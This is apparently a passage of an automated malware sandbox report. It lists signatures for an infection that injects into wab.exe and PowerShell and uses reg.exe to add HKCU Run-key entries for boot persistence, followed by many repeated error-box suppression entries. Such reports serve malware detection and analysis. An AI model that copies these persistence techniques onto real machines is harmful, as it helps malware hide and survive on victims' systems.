              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_0044693D push ecx; ret 17_2_0044694D
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_0044DB70 push eax; ret 17_2_0044DB84
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_0044DB70 push eax; ret 17_2_0044DBAC
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_00451D54 push eax; ret 17_2_00451D61
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 18_2_0044B090 push eax; ret 18_2_0044B0A4
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 18_2_0044B090 push eax; ret 18_2_0044B0CC
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 18_2_00444E71 push ecx; ret 18_2_00444E81
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_00414060 push eax; ret 19_2_00414074
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_00414060 push eax; ret 19_2_0041409C
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_00414039 push ecx; ret 19_2_00414049
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_004164EB push 0000006Ah; retf 19_2_004165C4
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_00416553 push 0000006Ah; retf 19_2_004165C4
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_00416555 push 0000006Ah; retf 19_2_004165C4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_0482CF28 pushfd ; ret 20_2_0482CF31
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_04823AD9 push ebx; retf 20_2_04823ADA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_076B0E67 push eax; mov dword ptr [esp], ecx 20_2_076B0E7C
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 26_2_21C809AD push ecx; mov dword ptr [esp], ecx 26_2_21C809B6
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 26_2_0329333A push ss; iretd 26_2_0329333B
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 26_2_0329426F push cs; ret 26_2_03294279
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 26_2_0329228B push FFFFFFDFh; iretd 26_2_0329228D
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 26_2_03293AF5 push 624F56A1h; ret 26_2_03293AFA
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 26_2_0328FFBC push ecx; retf 26_2_0328FFE9
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 26_2_0328EE6C push esi; retf 26_2_0328EE97

              Persistence and Installation Behavior

              Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
              Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
              Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
              Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe

              Boot Survival

              Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Bilateralities
              Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Almindeligheden
              Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Almindeligheden
              Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Almindeligheden
              Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Bilateralities
              Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Bilateralities
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 18_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,18_2_004047CB
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
